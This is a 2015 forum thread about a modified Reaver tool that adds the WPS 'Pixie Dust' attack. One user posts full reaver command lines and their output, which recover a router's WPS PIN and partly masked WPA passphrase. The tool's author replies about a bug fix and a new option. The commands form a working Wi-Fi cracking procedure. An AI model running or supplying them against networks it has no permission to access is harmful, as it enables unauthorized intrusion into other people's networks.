Reaver modfication for Pixie Dust Attack

**nuroo** · 2015-04-13

Awesome Sauce !! Nice job indeed.

When run from root I get error below. yes I did sudo make install after compile.

Code:

root@kali:~# reaver -i mon0 -b 08:**:0C:**:F4:** -vv -S -N -K1 

Reaver v1.5.1 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>
mod by t6_x <[email protected]>

[+] Waiting for beacon from 08:**:0C:**:F4:**
[+] Switching mon0 to channel 1
[+] Associated with 08:**:0C:**:F4:** (ESSID: TG1672GE2)
[+] Starting Cracking Session. Pin count: 0, Max pin attempts: 11000
[+] Trying pin 12345670.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[P] E-Nonce: 91:80:26:70:44:a0:80:c9:f1:93:f7:f8:44:88:f0:b7
[P] PKE: fa:6b:67:04:ce:29:9b:e7:9f:2d:7c:8b:9e:c5:9d:3b:1e:84:5c:cb:64:93:02:bb:29:3e:d0:5b:32:04:70:98:dc:d1:38:75:e3:68:54:5e:8f:3f:62:44:0c:08:06:89:58:a7:ba:08:59:91:7b:ee:63:e4:74:6a:47:de:f1:87:1c:ea:4d:47:2e:db:fe:41:51:e7:13:a2:55:85:b4:4d:98:d5:46:aa:4f:54:56:fe:4a:9a:b9:21:57:d8:ec:31:d6:61:b6:fe:55:e7:77:39:40:bc:d7:18:29:b8:c4:47:25:aa:3b:06:d7:f4:9a:72:72:cb:b4:30:a1:49:a7:97:b6:37:2f:76:4a:3d:c9:1d:0c:f1:75:ea:58:62:cc:a8:53:78:bf:93:fa:50:eb:5e:4f:2a:59:6e:ba:07:b5:d2:d7:b5:ca:2d:a4:57:3c:7a:87:61:26:dc:52:64:50:11:0e:4c:90:74:40:50:ae:9f:a5:b9:c1:9e:3f:38:93:a4
[P] WPS Manufacturer: Celeno Communication, Inc.
[P] WPS Model Number: CL1800
[+] Received M1 message
[P] PKR: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:02
[P] AuthKey: e1:21:a3:c4:34:de:bb:59:e2:8c:49:74:58:8e:79:f0:2f:b8:29:07:af:3d:62:2f:2a:9c:9e:61:9e:02:08:f0
[+] Sending M2 message
[P] E-Hash1: dc:fc:c2:c3:93:65:d6:15:f1:b6:3d:67:f3:39:61:0f:22:aa:78:a3:5d:41:eb:6d:67:fd:fc:bf:83:d4:f3:ee
[P] E-Hash2: ad:95:ea:36:96:ec:bc:16:47:b6:b6:d1:49:90:e4:eb:d7:cd:20:ff:84:92:d0:b2:fc:e0:75:37:d8:4d:92:0c
[Pixie-Dust]  
[Pixie-Dust]   [*] ES-1: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00
[Pixie-Dust]   [*] ES-2: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00
[Pixie-Dust]   [*] PSK1: 4a:72:15:42:21:4b:69:ef:10:a4:41:bd:df:75:01:a8
[Pixie-Dust]   [*] PSK2: 24:85:d0:a8:e4:20:c5:9d:04:d7:da:67:a6:df:af:3f
[Pixie-Dust]   [+] WPS pin: 8127****
[Pixie-Dust]  
[Pixie-Dust]   [*] Time taken: 0 s
[Pixie-Dust]  
Running the reaver with the correct pin wait ...

[Reaver Test] BSSID: 08:**:0C:**:F4:**
[Reaver Test] Channel: 1
sh: 1: ./reaver: not found

When run from src directory It works........

Code:

root@kali:~/reaver-wps-fork-t6x-master/src# reaver -i mon0 -b 08:**:0C:**:F4:** -vv -S -N -K1 

Reaver v1.5.1 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>
mod by t6_x <[email protected]>

[+] Waiting for beacon from 08:**:0C:**:F4:**
[+] Switching mon0 to channel 1
[+] Associated with 08:**:0C:**:F4:** (ESSID: TG1672GE2)
[+] Starting Cracking Session. Pin count: 0, Max pin attempts: 11000
[+] Trying pin 12345670.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[P] E-Nonce: aa:c5:79:80:9d:3b:cc:46:7a:d5:c9:f5:b5:20:ae:bf
[P] PKE: fa:6b:67:04:ce:29:9b:e7:9f:2d:7c:8b:9e:c5:9d:3b:1e:84:5c:cb:64:93:02:bb:29:3e:d0:5b:32:04:70:98:dc:d1:38:75:e3:68:54:5e:8f:3f:62:44:0c:08:06:89:58:a7:ba:08:59:91:7b:ee:63:e4:74:6a:47:de:f1:87:1c:ea:4d:47:2e:db:fe:41:51:e7:13:a2:55:85:b4:4d:98:d5:46:aa:4f:54:56:fe:4a:9a:b9:21:57:d8:ec:31:d6:61:b6:fe:55:e7:77:39:40:bc:d7:18:29:b8:c4:47:25:aa:3b:06:d7:f4:9a:72:72:cb:b4:30:a1:49:a7:97:b6:37:2f:76:4a:3d:c9:1d:0c:f1:75:ea:58:62:cc:a8:53:78:bf:93:fa:50:eb:5e:4f:2a:59:6e:ba:07:b5:d2:d7:b5:ca:2d:a4:57:3c:7a:87:61:26:dc:52:64:50:11:0e:4c:90:74:40:50:ae:9f:a5:b9:c1:9e:3f:38:93:a4
[P] WPS Manufacturer: Celeno Communication, Inc.
[P] WPS Model Number: CL1800
[+] Received M1 message
[P] PKR: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:02
[P] AuthKey: 0a:6b:15:aa:53:0d:c3:5f:56:bc:46:3a:a1:1a:89:26:ba:51:5b:1b:f6:9f:92:b3:c2:87:61:0b:e8:ce:c1:57
[+] Sending M2 message
[P] E-Hash1: 81:7e:70:4a:1e:62:f8:1f:d4:92:f3:60:0d:ea:52:a0:37:ca:75:e3:43:03:ca:fa:2b:60:5d:bf:33:03:9b:d8
[P] E-Hash2: 82:c1:62:2c:ff:00:81:f6:46:14:44:f3:2f:f8:f1:95:60:73:da:1d:b6:8e:fc:bb:f0:cd:ff:f9:ce:25:76:63
[Pixie-Dust]  
[Pixie-Dust]   [*] ES-1: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00
[Pixie-Dust]   [*] ES-2: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00
[Pixie-Dust]   [*] PSK1: dc:64:ee:9b:dc:4e:39:e5:9c:a7:f4:82:d5:b1:e2:8d
[Pixie-Dust]   [*] PSK2: 1d:7b:f9:0d:9c:0a:d8:a7:68:7e:3f:47:7b:59:e8:f9
[Pixie-Dust]   [+] WPS pin: 8127****
[Pixie-Dust]  
[Pixie-Dust]   [*] Time taken: 0 s
[Pixie-Dust]  
Running the reaver with the correct pin wait ...

[Reaver Test] BSSID: 08:**:0C:**:F4:**
[Reaver Test] Channel: 1
[Reaver Test] [+] WPS PIN: '8127****'
[Reaver Test] [+] WPA PSK: 'TG1672GD8****'
[Reaver Test] [+] AP SSID: 'TG1672GE2'

Probably my fault, just post my result, great job

**t6_x** · 2015-04-13

Probably my fault, just post my result, great job

ops, forgot to commit to the github lol, is my fault sorry

Commit done

sorry for that

I add a new option (-Z), with the -Z option he does not try to catch the pass automatically, it stops executing when it finishes running the pixiewps

I will add another option to have an option to output data to file, when you're ready I give commits

I will improve a bit the initial post

sorry again.

**nuroo** · 2015-04-14

U Fixed it.

-Z works correctly also

**popthattif** · 2015-04-15

it's wierd i got the same Pkr when i tryed Reaver on TP-LINK TD-W8961ND the only problem is Reaver always get stock at M2 so i didnt AuthKe,E-Hash1 and E-Hash2

Thread: Reaver modfication for Pixie Dust Attack

Thread Tools

Search Thread

Display

Hybrid View

Similar Threads

Reaver modfication for Pixie Dust Attack

Implement new WPS Pixie Dust Attack into Reaver

Posting Permissions